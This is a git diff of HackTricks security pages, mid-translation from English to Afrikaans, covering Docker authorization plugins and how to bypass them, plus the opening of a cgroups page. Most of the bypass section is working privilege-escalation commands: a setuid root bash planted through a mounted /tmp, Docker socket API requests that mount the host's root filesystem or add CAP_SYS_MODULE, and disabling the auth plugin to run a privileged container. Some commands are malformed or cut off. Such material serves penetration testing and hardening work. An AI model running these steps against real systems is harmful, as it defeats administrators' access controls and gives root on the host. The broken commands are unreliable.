💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-**Docker’s** out-of-the-box **authorization** model is **all or nothing**. Any user with permission to access the Docker daemon can **run any** Docker client **command**. The same is true for callers using Docker’s Engine API to contact the daemon. If you require **greater access control**, you can create **authorization plugins** and add them to your Docker daemon configuration. Using an authorization plugin, a Docker administrator can **configure granular access** policies for managing access to the Docker daemon. +**Docker se** out-of-the-box **outorisasiemodel** is **alles of niks**. Enige gebruiker met toestemming om die Docker-daemon te gebruik, kan **enige** Docker-kliënt **opdrag** uitvoer. Dieselfde geld vir oproepers wat die Docker Engine API gebruik om die daemon te kontak. As jy **groter toegangsbeheer** benodig, kan jy **outorisasie-plugins** skep en dit by jou Docker-daemon-konfigurasie voeg. Met behulp van 'n outorisasie-plugin kan 'n Docker-administrator **fynkorrelige toegangspolisse** instel om toegang tot die Docker-daemon te bestuur. -# Basic architecture +# Basiese argitektuur -Docker Auth plugins are **external** **plugins** you can use to **allow/deny** **actions** requested to the Docker Daemon **depending** on the **user** that requested it and the **action** **requested**. +Docker Auth-plugins is **eksterne plugins** wat jy kan gebruik om **aksies** wat aan die Docker Daemon gevra word, **toe te laat/weier** afhangende van die **gebruiker** wat dit gevra het en die **gevraagde aksie**. -**[The following info is from the docs](https://docs.docker.com/engine/extend/plugins_authorization/#:~:text=If%20you%20require%20greater%20access,access%20to%20the%20Docker%20daemon)** +**[Die volgende inligting is van die dokumentasie](https://docs.docker.com/engine/extend/plugins_authorization/#:~:text=If%20you%20require%20greater%20access,access%20to%20the%20Docker%20daemon)** -When an **HTTP** **request** is made to the Docker **daemon** through the CLI or via the Engine API, the **authentication** **subsystem** **passes** the request to the installed **authentication** **plugin**(s). The request contains the user (caller) and command context. The **plugin** is responsible for deciding whether to **allow** or **deny** the request. +Wanneer 'n **HTTP-aanvraag** deur die CLI of via die Engine API na die Docker-daemon gestuur word, stuur die **outentiseringsondersteuning** die aanvraag na die geïnstalleerde **outentiseringsplugin**(s). Die aanvraag bevat die gebruiker (oproeper) en opdragkonteks. Die **plugin** is verantwoordelik vir die besluit of die aanvraag **toegelaat** of **geweier** moet word. -The sequence diagrams below depict an allow and deny authorization flow: +Die volgende sekansdiagramme toon 'n toelaat- en weieringsvloei vir outorisasie: -![Authorization Allow flow](https://docs.docker.com/engine/extend/images/authz\_allow.png) +![Toelaat-outorisasievloei](https://docs.docker.com/engine/extend/images/authz\_allow.png) -![Authorization Deny flow](https://docs.docker.com/engine/extend/images/authz\_deny.png) +![Weieringsoutorisasievloei](https://docs.docker.com/engine/extend/images/authz\_deny.png) -Each request sent to the plugin **includes the authenticated user, the HTTP headers, and the request/response body**. Only the **user name** and the **authentication method** used are passed to the plugin. Most importantly, **no** user **credentials** or tokens are passed. Finally, **not all request/response bodies are sent** to the authorization plugin. Only those request/response bodies where the `Content-Type` is either `text/*` or `application/json` are sent. +Elke aanvraag wat na die plugin gestuur word, **bevat die geoutentiseerde gebruiker, die HTTP-koppe, en die aanvraag/antwoordliggaam**. Slegs die **gebruikersnaam** en die **outentiseringsmetode** wat gebruik is, word aan die plugin oorgedra. Belangrik is dat **geen** gebruikers **vollegetuigskrifte** of tokens oorgedra word nie. Laastens word **nie alle aanvraag/antwoordliggame** na die outorisasie-plugin gestuur nie. Slegs daardie aanvraag/antwoordliggame waar die `Content-Type` óf `text/*` óf `application/json` is, word gestuur. -For commands that can potentially hijack the HTTP connection (`HTTP Upgrade`), such as `exec`, the authorization plugin is only called for the initial HTTP requests. Once the plugin approves the command, authorization is not applied to the rest of the flow. Specifically, the streaming data is not passed to the authorization plugins. For commands that return chunked HTTP response, such as `logs` and `events`, only the HTTP request is sent to the authorization plugins. +Vir opdragte wat die HTTP-verbinding kan oorneem (`HTTP Upgrade`), soos `exec`, word die outorisasie-plugin slegs geroep vir die aanvanklike HTTP-aanvrae. Sodra die plugin die opdrag goedkeur, word outorisasie nie op die res van die vloei toegepas nie. Spesifiek word die stroomdata nie aan die outorisasie-plugins oorgedra nie. Vir opdragte wat 'n stuksgewyse HTTP-antwoord teruggee, soos `logs` en `events`, word slegs die HTTP-aanvraag na die outorisasie-plugins gestuur. -During request/response processing, some authorization flows might need to do additional queries to the Docker daemon. To complete such flows, plugins can call the daemon API similar to a regular user. To enable these additional queries, the plugin must provide the means for an administrator to configure proper authentication and security policies. +Tydens die verwerking van aanvrae/antwoorde kan sommige outorisasievloei moontlik addisionele navrae aan die Docker-daemon doen. Om sulke vloei te voltooi, kan plugins die daemon API oproep soos 'n gewone gebruiker. Om sulke addisionele navrae moontlik te maak, moet die plugin die middels voorsien om 'n administrateur in staat te stel om behoorlike outentisering- en sekuriteitsbeleide te konfigureer. -## Several Plugins +## Verskeie Plugins -You are responsible for **registering** your **plugin** as part of the Docker daemon **startup**. You can install **multiple plugins and chain them together**. This chain can be ordered. Each request to the daemon passes in order through the chain. Only when **all the plugins grant access** to the resource, is the access granted. +Jy is verantwoordelik vir die **registreer** van jou **plugin** as deel van die Docker-daemon se **beginproses**. Jy kan **verskeie plugins installeer en aanmekaar koppel**. Hierdie ketting kan georden word. Elke aanvraag aan die daemon gaan in volgorde deur die ketting. Slegs as **alle plugins toegang verleen** tot die hulpbron, word die toegang verleen. -# Plugin Examples +# Plugin-voorbeelde ## Twistlock AuthZ Broker -The plugin [**authz**](https://github.com/twistlock/authz) allows you to create a simple **JSON** file that the **plugin** will be **reading** to authorize the requests. Therefore, it gives you the opportunity to control very easily which API endpoints can reach each user. +Die plugin [**authz**](https://github.com/twistlock/authz) stel jou in staat om 'n eenvoudige **JSON**-lêer te skep wat die **plugin** sal **lees** om die aanvrae te outoriseer. Dit gee jou dus die geleentheid om baie maklik te beheer watter API-eindpunte elke gebruiker kan bereik. -This is an example that will allow Alice and Bob can create new containers: `{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}` +Hier is 'n voorbeeld wat Alice en Bob in staat stel om nuwe houers te skep: `{"name":"policy_3","users":["alice","bob"],"actions":["container_create"]}` -In the page [route\_parser.go](https://github.com/twistlock/authz/blob/master/core/route\_parser.go) you can find the relation between the requested URL and the action. In the page [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) you can find the relation between the action name and the action +Op die bladsy [route\_parser.go](https://github.com/twistlock/authz/blob/master/core/route\_parser.go) kan jy die verband tussen die gevraagde URL en die aksie vind. Op die bladsy [types.go](https://github.com/twistlock/authz/blob/master/core/types.go) kan jy die verband tussen die aksienaam en die aksie vind. -## Simple Plugin Tutorial +## Eenvoudige Plugin-tutoriaal -You can find an **easy to understand plugin** with detailed information about installation and debugging here: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) +Jy kan 'n **maklik verstaanbare plugin** met gedetailleerde inligting oor installasie en foutopsporing hier vind: [**https://github.com/carlospolop-forks/authobot**](https://github.com/carlospolop-forks/authobot) -Read the `README` and the `plugin.go` code to understand how is it working. +Lees die `README` en die `plugin.go`-kode om te verstaan hoe dit werk. -# Docker Auth Plugin Bypass +# Docker Auth Plugin-omseiling -## Enumerate access +## Toegang opspoor -The main things to check are the **which endpoints are allowed** and **which values of HostConfig are allowed**. +Die belangrikste dinge om te ondersoek is **watter eindpunte toegelaat word** en **watter waardes van HostConfig toegelaat word**. -To perform this enumeration you can **use the tool** [**https://github.com/carlospolop/docker\_auth\_profiler**](https://github.com/carlospolop/docker\_auth\_profiler)**.** +Om hierdie opsporing uit te voer, kan jy die instrument [**https://github.com/carlospolop/docker\_auth\_profiler**](https://github.com/carlospolop/docker\_auth\_profiler) **gebruik**. -## disallowed `run --privileged` - -### Minimum Privileges +## Verbode `run --privileged` +### Minimumvoorregte ```bash docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash ``` +### Uitvoer van 'n houer en dan 'n bevoorregte sessie kry -### Running a container and then getting a privileged session - -In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container: - +In hierdie geval het die stelseladministrateur gebruikers verhinder om volumes te monteer en houers met die `--privileged` vlag uit te voer, of enige ekstra vermoë aan die houer te gee: ```bash docker run -d --privileged modified-ubuntu docker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed. See 'docker run --help'. ``` - -However, a user can **create a shell inside the running container and give it the extra privileges**: - +Een gebruiker kan egter **'n skulp binne die lopende houer skep en dit die ekstra voorregte gee**: ```bash docker run -d --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu #bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de @@ -96,43 +89,39 @@ docker exec -it ---cap-add=ALL bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be # With --cap-add=SYS_ADMIN docker exec -it ---cap-add=SYS_ADMIN bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4 bash ``` +Nou kan die gebruiker ontsnap uit die houer deur enige van die [voorheen bespreekte tegnieke](./#privileged-flag) te gebruik en voorregte binne die gasheer te verhoog. -Now, the user can escape from the container using any of the [**previously discussed techniques**](./#privileged-flag) and **escalate privileges** inside the host. - -## Mount Writable Folder - -In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder: +## Monteer Skryfbare Vouer +In hierdie geval het die stelseladministrateur gebruikers verhoed om houers met die `--privileged` vlag te hardloop of enige ekstra vermoë aan die houer te gee, en hy het slegs toegelaat om die `/tmp` vouer te monteer: ```bash host> cp /bin/bash /tmp #Cerate a copy of bash host> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell docker container> chown root:root /host/bash docker container> chmod u+s /host/bash host> /tmp/bash - -p #This will give you a shell as root +-p #This will give you a shell as root ``` - {% hint style="info" %} -Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type d 2>/dev/null` +Let daarop dat jy dalk nie die `/tmp`-vouer kan koppel nie, maar jy kan 'n **ander skryfbare vouer** koppel. Jy kan skryfbare gidslys vind deur die volgende te gebruik: `find / -writable -type d 2>/dev/null` -**Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. +**Let daarop dat nie alle gidslysies in 'n Linux-masjien die suid-bit sal ondersteun nie!** Om te bepaal watter gidslysies die suid-bit ondersteun, voer jy `mount | grep -v "nosuid"` uit. Byvoorbeeld, gewoonlik ondersteun `/dev/shm`, `/run`, `/proc`, `/sys/fs/cgroup` en `/var/lib/lxcfs` nie die suid-bit nie. -Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges (maybe modifying `/etc/shadow`) +Let ook daarop dat as jy `/etc` of enige ander vouer **wat konfigurasie-lêers bevat** kan koppel, jy dit as root vanuit die Docker-houer kan wysig om **privileges te verhoog** (dalk deur `/etc/shadow` te wysig). {% endhint %} -## Unchecked API Endpoint +## Ongekontroleerde API-eindpunt -The responsibility of the sysadmin configuring this plugin would be to control which actions and with which privileges each user can perform. Therefore, if the admin takes a **blacklist** approach with the endpoints and the attributes he might **forget some of them** that could allow an attacker to **escalate privileges.** +Die verantwoordelikheid van die stelseladministrateur wat hierdie invoegtoepassing konfigureer, sou wees om te beheer watter aksies en met watter bevoegdhede elke gebruiker kan uitvoer. Daarom, as die administrateur 'n **swartlys**-benadering volg met die eindpunte en die eienskappe, kan hy dalk sommige daarvan **vergeet** wat 'n aanvaller in staat sou stel om **privileges te verhoog**. -You can check the docker API in [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) +Jy kan die Docker API nagaan by [https://docs.docker.com/engine/api/v1.40/#](https://docs.docker.com/engine/api/v1.40/#) -## Unchecked JSON Structure +## Ongekontroleerde JSON-Struktuur -### Binds in root - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Binds**".\ -In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root (/) folder of the host: +### Bind in die wortel +Dit is moontlik dat die stelseladministrateur, toe hy die Docker-firewall gekonfigureer het, 'n belangrike parameter van die [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) soos "**Binds**" **vergeet** het.\ +In die volgende voorbeeld is dit moontlik om van hierdie konfigurasiefout gebruik te maak om 'n houer te skep en uit te voer wat die wortel (/) vouer van die gasheer koppel: ```bash docker version #First, find the API version of docker, 1.40 in this example docker images #List the images available @@ -142,39 +131,31 @@ docker start f6932bc153ad #Start the created privileged container docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it #You can access the host filesystem ``` - {% hint style="warning" %} -Note how in this example we are using the **`Binds`** param as a root level key in the JSON but in the API it appears under the key **`HostConfig`** +Let daarop hoe ons in hierdie voorbeeld die **`Binds`** param gebruik as 'n sleutel op die hoofvlak in die JSON, maar in die API verskyn dit onder die sleutel **`HostConfig`** {% endhint %} ### Binds in HostConfig -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +Volg dieselfde instruksies soos met **Binds in root** deur hierdie **versoek** na die Docker API te doen: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Binds":["/:/host"]}}' http:/v1.40/containers/create ``` +### Monteerings in die wortel -### Mounts in root - -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +Volg dieselfde instruksies soos met **Bind in die wortel** deur hierdie **versoek** na die Docker API uit te voer: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}' http:/v1.40/containers/create ``` +### Monteer in HostConfig -### Mounts in HostConfig - -Follow the same instruction as with **Binds in root** performing this **request** to the Docker API: - +Volg dieselfde instruksies soos met **Binds in root** deur hierdie **versoek** na die Docker API te doen: ```bash curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu-sleep", "HostConfig":{"Mounts": [{"Name": "fac36212380535", "Source": "/", "Destination": "/host", "Driver": "local", "Mode": "rw,Z", "RW": true, "Propagation": "", "Type": "bind", "Target": "/host"}]}}' http:/v1.40/containers/cre ``` +## Ongekontroleerde JSON-attribuut -## Unchecked JSON Attribute - -It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS\_MODULE** capability: - +Dit is moontlik dat toe die stelseladministrateur die docker-firewall gekonfigureer het, hy **vergeet het van 'n belangrike attribuut van 'n parameter** van die [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) soos "**Capabilities**" binne "**HostConfig**". In die volgende voorbeeld is dit moontlik om van hierdie verkeerde konfigurasie misbruik te maak om 'n houer met die **SYS\_MODULE**-vermoë te skep en uit te voer: ```bash docker version curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}' http:/v1.40/containers/create @@ -184,15 +165,13 @@ docker exec -it c52a77629a91 bash capsh --print #You can abuse the SYS_MODULE capability ``` - {% hint style="info" %} -The **`HostConfig`** is the key that usually contains the **interesting** **privileges** to escape from the container. However, as we have discussed previously, note how using Binds outside of it also works and may allow you to bypass restrictions. +Die **`HostConfig`** is die sleutel wat gewoonlik die **interessante** **voorregte** bevat om uit die houer te ontsnap. Let egter daarop dat die gebruik van Binds buite dit ook werk en jou mag toelaat om beperkings te omseil. {% endhint %} -## Disabling Plugin - -If the **sysadmin** **forgotten** to **forbid** the ability to **disable** the **plugin**, you can take advantage of this to completely disable it! +## Plugin Deaktivering +As die **sysadmin** die vermoë om die **plugin** te **deaktiveer** vergeet het, kan jy hiervan gebruik maak om dit heeltemal te deaktiveer! ```bash docker plugin list #Enumerate plugins @@ -204,30 +183,27 @@ docker plugin disable authobot docker run --rm -it --privileged -v /:/host ubuntu bash docker plugin enable authobot ``` - -Remember to **re-enable the plugin after escalating**, or a **restart of docker service won’t work**! +Onthou om die invoegtoepassing **weer te aktiveer nadat jy toegang verkry het**, anders sal 'n **herlaai van die docker-diens nie werk nie**! ## Auth Plugin Bypass writeups * [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/) -## References +## Verwysings * [https://docs.docker.com/engine/extend/plugins\_authorization/](https://docs.docker.com/engine/extend/plugins\_authorization/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/linux-hardening/privilege-escalation/docker-security/cgroups.md b/linux-hardening/privilege-escalation/docker-security/cgroups.md index bfed62d90..2d12581cb 100644 --- a/linux-hardening/privilege-escalation/docker-security/cgroups.md +++ b/linux-hardening/privilege-escalation/docker-security/cgroups.md @@ -2,30 +2,29 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Linux Control Groups**, or **cgroups**, are a feature of the Linux kernel that allows the allocation, limitation, and prioritization of system resources like CPU, memory, and disk I/O among process groups. They offer a mechanism for **managing and isolating the resource usage** of process collections, beneficial for purposes such as resource limitation, workload isolation, and resource prioritization among different process groups. +**Linux-beheergroepe**, of **cgroups**, is 'n kenmerk van die Linux-kernel wat die toekenning, beperking en prioritisering van stelselhulpbronne soos CPU, geheue en skyf-I/O aan prosesgroepe moontlik maak. Dit bied 'n meganisme vir die **bestuur en isolering van die hulpbronverbruik** van prosesversamelings, wat voordelig is vir doeleindes soos hulpbronbeperking, werklastisolering en hulpbronprioritisering tussen verskillende prosesgroepe. -There are **two versions of cgroups**: version 1 and version 2. Both can be used concurrently on a system. The primary distinction is that **cgroups version 2** introduces a **hierarchical, tree-like structure**, enabling more nuanced and detailed resource distribution among process groups. Additionally, version 2 brings various enhancements, including: +Daar is **twee weergawes van cgroups**: weergawe 1 en weergawe 2. Beide kan gelyktydig op 'n stelsel gebruik word. Die primêre onderskeid is dat **cgroups weergawe 2** 'n **hiërargiese, boomagtige struktuur** inbring wat meer genuanseerde en gedetailleerde hulpbronverspreiding tussen prosesgroepe moontlik maak. Daarbenewens bring weergawe 2 verskeie verbeterings, insluitend: -In addition to the new hierarchical organization, cgroups version 2 also introduced **several other changes and improvements**, such as support for **new resource controllers**, better support for legacy applications, and improved performance. +Naas die nuwe hiërargiese organisasie het cgroups weergawe 2 ook **verskeie ander veranderinge en verbeterings** ingevoer, soos ondersteuning vir **nuwe hulpbronbeheerders**, beter ondersteuning vir oudtydse toepassings en verbeterde prestasie. -Overall, cgroups **version 2 offers more features and better performance** than version 1, but the latter may still be used in certain scenarios where compatibility with older systems is a concern. - -You can list the v1 and v2 cgroups for any process by looking at its cgroup file in /proc/\. You can start by looking at your shell’s cgroups with this command: +Oor die algemeen bied cgroups **weergawe 2 meer funksies en beter prestasie** as weergawe 1, maar laasgenoemde kan steeds in sekere scenario's gebruik word waar verenigbaarheid met oudere stelsels 'n oorweging is. +Jy kan die v1- en v2-cgroups vir enige proses lys deur na sy cgroup-lêer in /proc/\ te kyk. Jy kan begin deur na jou skel se cgroups te kyk met hierdie opdrag: ```shell-session $ cat /proc/self/cgroup 12:rdma:/ @@ -40,75 +39,67 @@ $ cat /proc/self/cgroup 1:name=systemd:/user.slice/user-1000.slice/session-2.scope 0::/user.slice/user-1000.slice/session-2.scope ``` +Die uitsetstruktuur is as volg: -The output structure is as follows: +- **Nommers 2-12**: cgroups v1, met elke lyn wat 'n verskillende cgroup verteenwoordig. Kontroleerders vir hierdie cgroups word langs die nommer gespesifiseer. +- **Nommer 1**: Ook cgroups v1, maar slegs vir bestuursdoeleindes (deur bv. systemd ingestel), en het nie 'n kontroleerder nie. +- **Nommer 0**: Verteenwoordig cgroups v2. Geen kontroleerders word gelys nie, en hierdie lyn is eksklusief vir stelsels wat slegs cgroups v2 gebruik. +- Die **name is hiërargies**, soos lêerpaadjies, wat die struktuur en verhouding tussen verskillende cgroups aandui. +- **Name soos /user.slice of /system.slice** spesifiseer die kategorisering van cgroups, met user.slice tipies vir aanmeldsessies wat deur systemd bestuur word en system.slice vir stelseldienste. -- **Numbers 2–12**: cgroups v1, with each line representing a different cgroup. Controllers for these are specified adjacent to the number. -- **Number 1**: Also cgroups v1, but solely for management purposes (set by, e.g., systemd), and lacks a controller. -- **Number 0**: Represents cgroups v2. No controllers are listed, and this line is exclusive on systems only running cgroups v2. -- The **names are hierarchical**, resembling file paths, indicating the structure and relationship between different cgroups. -- **Names like /user.slice or /system.slice** specify the categorization of cgroups, with user.slice typically for login sessions managed by systemd and system.slice for system services. +### Sien cgroups -### Viewing cgroups +Die lêersisteem word tipies gebruik om toegang tot **cgroups** te verkry, wat afwyk van die Unix-stelseloproepkoppelvlak wat tradisioneel gebruik word vir kernelinteraksies. Om 'n skulp se cgroup-konfigurasie te ondersoek, moet jy die **/proc/self/cgroup**-lêer ondersoek, wat die skulp se cgroup onthul. Daarna kan jy deur na die **/sys/fs/cgroup** (of **`/sys/fs/cgroup/unified`**) gids te navigeer en 'n gids te vind wat die naam van die cgroup deel, verskeie instellings en hulpbronverbruiksinligting wat relevant is vir die cgroup, waarneem. -The filesystem is typically utilized for accessing **cgroups**, diverging from the Unix system call interface traditionally used for kernel interactions. To investigate a shell's cgroup configuration, one should examine the **/proc/self/cgroup** file, which reveals the shell's cgroup. Then, by navigating to the **/sys/fs/cgroup** (or **`/sys/fs/cgroup/unified`**) directory and locating a directory that shares the cgroup's name, one can observe various settings and resource usage information pertinent to the cgroup. +![Cgroup-lêersisteem](../../../.gitbook/assets/image%20(10)%20(2)%20(2).png) -![Cgroup Filesystem](../../../.gitbook/assets/image%20(10)%20(2)%20(2).png) - -The key interface files for cgroups are prefixed with **cgroup**. The **cgroup.procs** file, which can be viewed with standard commands like cat, lists the processes within the cgroup. Another file, **cgroup.threads**, includes thread information. +Die sleutelkoppelvlaklêers vir cgroups het die voorvoegsel **cgroup**. Die **cgroup.procs**-lêer, wat met standaardopdragte soos cat bekyk kan word, lys die prosesse binne die cgroup. 'n Ander lêer, **cgroup.threads**, bevat draadinligting. ![Cgroup Procs](../../../.gitbook/assets/image%20(1)%20(1)%20(5).png) -Cgroups managing shells typically encompass two controllers that regulate memory usage and process count. To interact with a controller, files bearing the controller's prefix should be consulted. For instance, **pids.current** would be referenced to ascertain the count of threads in the cgroup. +Cgroups wat skulpe bestuur, omvat tipies twee kontroleerders wat geheugengebruik en prosessetelling reguleer. Om met 'n kontroleerder te kommunikeer, moet lêers met die voorvoegsel van die kontroleerder geraadpleeg word. Byvoorbeeld, **pids.current** sal geraadpleeg word om die telling van drade in die cgroup te bepaal. -![Cgroup Memory](../../../.gitbook/assets/image%20(3)%20(5).png) +![Cgroup-geheue](../../../.gitbook/assets/image%20(3)%20(5).png) -The indication of **max** in a value suggests the absence of a specific limit for the cgroup. However, due to the hierarchical nature of cgroups, limits might be imposed by a cgroup at a lower level in the directory hierarchy. +Die aanduiding van **max** in 'n waarde dui op die afwesigheid van 'n spesifieke limiet vir die cgroup. Tog, as gevolg van die hiërargiese aard van cgroups, kan limiete opgelê word deur 'n cgroup op 'n laer vlak in die gidshiërargie. +### Manipulering en Skepping van cgroups -### Manipulating and Creating cgroups - -Processes are assigned to cgroups by **writing their Process ID (PID) to the `cgroup.procs` file**. This requires root privileges. For instance, to add a process: - +Prosesse word aan cgroups toegewys deur **hul Proses-ID (PID) na die `cgroup.procs`-lêer te skryf**. Dit vereis root-voorregte. Byvoorbeeld, om 'n proses by te voeg: ```bash echo [pid] > cgroup.procs ``` - -Similarly, **modifying cgroup attributes, like setting a PID limit**, is done by writing the desired value to the relevant file. To set a maximum of 3,000 PIDs for a cgroup: - +Op soortgelyke wyse word **cgroup-eienskappe gewysig, soos die instelling van 'n PID-limiet**, deur die gewenste waarde na die betrokke lêer te skryf. Om 'n maksimum van 3,000 PIDs vir 'n cgroup in te stel: ```bash echo 3000 > pids.max ``` +**Die skep van nuwe cgroups** behels die skep van 'n nuwe subgids binne die cgroup-hierargie, wat die kernel aanmoedig om outomaties die nodige interfeeslêers te genereer. Alhoewel cgroups sonder aktiewe prosesse met `rmdir` verwyder kan word, moet daar bewus wees van sekere beperkings: -**Creating new cgroups** involves making a new subdirectory within the cgroup hierarchy, which prompts the kernel to automatically generate necessary interface files. Though cgroups without active processes can be removed with `rmdir`, be aware of certain constraints: - -- **Processes can only be placed in leaf cgroups** (i.e., the most nested ones in a hierarchy). -- **A cgroup cannot possess a controller absent in its parent**. -- **Controllers for child cgroups must be explicitly declared** in the `cgroup.subtree_control` file. For example, to enable CPU and PID controllers in a child cgroup: - +- **Prosesse kan slegs in blaar-cgroups geplaas word** (d.w.s. die mees geneste in 'n hiërargie). +- **'n Cgroup kan nie 'n beheerder besit wat afwesig is in sy ouer nie**. +- **Beheerders vir kind-cgroups moet eksplisiet verklaar word** in die `cgroup.subtree_control`-lêer. Byvoorbeeld, om die CPU- en PID-beheerders in 'n kind-cgroup te aktiveer: ```bash echo "+cpu +pids" > cgroup.subtree_control ``` +Die **root cgroup** is 'n uitsondering op hierdie reëls en maak direkte prosesplasing moontlik. Dit kan gebruik word om prosesse uit systemd-bestuur te verwyder. -The **root cgroup** is an exception to these rules, allowing direct process placement. This can be used to remove processes from systemd management. +**Monitering van CPU-gebruik** binne 'n cgroup is moontlik deur die `cpu.stat` lêer, wat die totale CPU-tyd wat verbruik is, vertoon. Dit is nuttig om gebruik oor 'n diens se subprosesse te volg: -**Monitoring CPU usage** within a cgroup is possible through the `cpu.stat` file, 